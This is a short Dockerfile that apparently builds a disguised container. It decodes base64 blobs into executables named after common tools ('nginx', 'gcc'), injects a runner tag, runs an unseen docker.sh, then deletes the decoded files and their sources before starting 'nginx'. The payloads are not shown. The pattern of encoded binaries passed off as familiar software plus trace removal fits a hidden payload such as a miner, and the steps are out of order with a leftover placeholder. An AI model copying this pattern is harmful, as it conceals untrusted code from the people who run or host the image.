FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > nginx.log'
RUN base64 --decode nginx.64 > nginx
RUN base64 --decode gcc.64 > gcc
RUN chmod +x gcc

COPY nginx .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' nginx
RUN bash ./docker.sh
RUN rm --force --recursive nginx _REPO_NAME__.64 docker.sh gcc gcc.64

CMD nginx
